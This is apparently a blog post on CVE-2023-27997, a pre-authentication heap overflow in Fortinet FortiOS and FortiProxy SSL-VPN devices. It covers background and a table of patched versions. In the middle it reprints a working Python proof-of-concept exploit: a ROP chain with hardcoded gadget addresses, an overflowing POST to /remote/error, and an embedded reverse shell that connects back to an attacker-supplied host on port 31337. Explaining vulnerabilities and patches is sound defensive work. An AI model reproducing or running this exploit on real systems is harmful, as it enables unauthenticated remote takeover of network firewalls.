The cyber threat landscape is a constantly evolving space where new vulnerabilities are discovered and old ones are patched up. However, the cat-and-mouse game between attackers and defenders often leads to gaps in security, which can be ruthlessly exploited. A recent example of this is the discovery of a critical heap-based buffer overflow vulnerability in Fortinet FortiOS and FortiProxy SSL-VPN devices, dubbed CVE-2023-27997. This post aims to delve into the details of this vulnerability and provides an in-depth understanding of a proof-of-concept code associated with it.
Background
On June 12, 2023, Fortinet issued an advisory about the critical vulnerability in their FortiOS and FortiProxy products, highlighting its severity. The vulnerability, known as CVE-2023-27997, is a heap-based buffer overflow flaw that exists in the secure socket layer virtual private network (SSL VPN) functionality of the Fortinet devices, including its FortiGate Next Generation Firewalls (NGFW).
The vulnerability allows an unauthenticated, remote attacker to exploit it by sending specially crafted requests to a vulnerable device. Successful exploitation of this vulnerability could grant an attacker the ability to execute arbitrary code on the affected device. This vulnerability can be reached pre-authentication and hence poses a significant threat to any organization using these devices.
Researchers Charles Fol and Dany Bach from LEXFO were the first to discover this vulnerability, and Fortinet has acknowledged that it may have been exploited in a limited number of cases. Further, nearly 260,000 Fortinet FortiGate firewalls that are publicly accessible were found, which potentially expands the scope of this vulnerability.
SSL VPN vulnerabilities like these are prime targets for cybercriminals. Over the past five years, multiple instances of such vulnerabilities being exploited in the wild have been observed. State-sponsored actors and cybercriminal groups alike have targeted such flaws for initial access into target systems.
Proof of Concept
While no proof-of-concept (PoC) exploit code was available at the time of the initial report on CVE-2023-27997, a user has provided a Python script that serves as a possible exploit. See PoC here.
For those not familiar with Python or coding in general, understanding this script might seem like a daunting task. To break it down, let's walk through the code and explain what each part does
import socket
import ssl
from pwn import *
import time
import sys
import requests
context = ssl.SSLContext()
target_host = sys.argv[1]
target_port = sys.argv[2]
reverse = sys.argv[3]
params = sys.argv[4].split(" ")
strparams = "["
for param in params:
strparams += "'"+param+"',"
strparams = strparams[:-1]
strparams += "]"
#binary functions
execve = p64(0x0042e050)
#binary gadgets
movrdirax = p64(0x00000000019d2196)# : mov rdi, rax ; call r13
poprsi = p64(0x000000000042f0f8)# : pop rsi ; ret)
poprdx = p64(0x000000000042f4a5)# : pop rdx ; ret)
jmprax = p64(0x0000000000433181)#: jmp rax)
pops = p64(0x000000000165cfd7)# : pop rdx ; pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret)
poprax = p64(0x00000000004359af)# : pop rax ; ret)
gadget1 = p64(0x0000000001697e0d); #0x0000000001697e0d : push rbx ; sbb byte ptr [rbx + 0x41], bl ; pop rsp ; pop rbp ; ret
poprdi = p64(0x000000000042ed7e)# : pop rdi ; ret
rax3 = gadget1
#hardcoded value which would probably need to be bruteforced or leaked
hardcoded = 0x00007fc5f128e000
scbase = p64(hardcoded)
rdi = p64(hardcoded + 0xc48)
cmd = p64(hardcoded + 0xd38)
asdf = hardcoded + 0xd38
cmd1 = p64(asdf)
cmd2 = p64(asdf+16)
arg1 = p64(asdf+48)
arg2 = p64(asdf+56)
arg3 = p64(asdf+64)
ropchain = poprax
ropchain += execve
ropchain += poprdi
ropchain += cmd1
ropchain += poprsi
ropchain += cmd2
ropchain += poprdx
ropchain += p64(0)
ropchain += jmprax
ropchain += b"/bin/python\x00\x00\x00\x00\x00"
ropchain += arg1
ropchain += arg2
ropchain += arg3
ropchain += p64(0)
ropchain += b"python\x00\x00"
ropchain += b"-c\x00\x00\x00\x00\x00\x00"
ropchain += b"""import socket,sys,os\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\ns.connect(('"""+ reverse.encode() + b"""',31337))\n[os.dup2(s.fileno(),x) for x in range(3)]\ni=os.fork()\nif i==0:\n os.execve('/bin/sh', """+strparams.encode()+b""",{})\n\x00\x00"""
try:
with socket.create_connection((target_host, int(target_port,10))) as sock:
with context.wrap_socket(sock, server_hostname=target_host) as ssock:
ssock.settimeout(2)
context.verify_mode = ssl.CERT_NONE
payload = b"A"*173096+rdi+poprdi+cmd+pops+b"A"*40+pops+rax3+b"C"*32+ropchain
tosend = b"POST /remote/error HTTP/1.1\r\nHost: "+target_host +b"\r\nContent-Length: 115964117980\r\n\r\n" + payload
ssock.sendall(tosend)
r = ssock.recv(10024)
except Exception as e:
print("Exception occurred :"+ repr(e))The script begins by importing several libraries, including socket, ssl, and requests. These libraries enable network connections, SSL/TLS functionality, and HTTP requests, respectively. The script then prepares a context for SSL/TLS connections and sets up several variables for target information and parameters.
The core part of the exploit script consists of several "binary functions" and "binary gadgets". These are essentially segments of pre-compiled machine code that can be used to perform specific operations on a system. In this case, the script is preparing an "ROP chain" (Return Oriented Programming chain), a common exploit technique that allows an attacker to execute arbitrary code by taking advantage of existing code snippets or "gadgets" within the system's memory.
The payload of the exploit is prepared by repeating a certain character a specified number of times to overflow the buffer and then appending the prepared ROP chain to it. This payload is then sent in an HTTP POST request to the target host via an SSL/TLS connection. If successful, this script would execute the arbitrary code defined in the ROP chain on the target host.
PoC script, the targeted devices are those with the SSL-VPN functionality enabled, particularly the Fortinet FortiOS and FortiProxy SSL-VPN devices. The exploit targets a heap-based buffer overflow vulnerability, which allows the attacker to execute arbitrary code on the target device.
Mitigation
Given the severity of the issue, it is crucial to understand the steps required to mitigate the risk associated with this vulnerability. According to the advisory issued by Fortinet, several versions of FortiOS and FortiProxy are affected, and patches have been released to address the issue. The following table provides an overview of the affected versions and their corresponding fixed versions:
Product | Affected Versions | Fixed Versions |
FortiOS-6K7K | 7.0.5, 7.0.10 | 7.0.12 or above |
FortiOS-6K7K | 6.4.2, 6.4.6, 6.4.8, 6.4.10, 6.4.12 | 6.4.13 or above |
FortiOS-6K7K | 6.2.4, 6.2.6 through 6.2.7, 6.2.9 through 6.2.13 | 6.2.15 or above |
FortiOS-6K7K | 6.0.10, 6.0.12 through 6.0.16 | 6.0.17 or above |
FortiOS | 7.2.0 through 7.2.4 | 7.2.5 or above |
FortiOS | 7.0.0 through 7.0.11 | 7.0.12 or above |
FortiOS | 6.4.0 through 6.4.12 | 6.4.13 or above |
FortiOS | 6.0.0 through 6.0.16 | 6.0.17 or above |
FortiProxy | 7.2.0 through 7.2.3 | 7.2.4 or above |
It is recommended that organizations using these products promptly apply the patches provided by Fortinet to mitigate the risk associated with this vulnerability. Besides, as a general cybersecurity best practice, organizations should ensure that their devices are not publicly accessible unless necessary and should implement strict access controls and monitoring to detect and prevent potential attacks.
Conclusion
The discovery of the CVE-2023-27997 vulnerability underscores the critical role of maintaining up-to-date security patches and constantly monitoring for potential cyber threats. It is a stark reminder that even seemingly secure devices and systems can have critical vulnerabilities that can be exploited by cybercriminals. By understanding the nature of these vulnerabilities and implementing appropriate mitigation strategies, organizations can significantly reduce their risk exposure and ensure the security of their systems and data.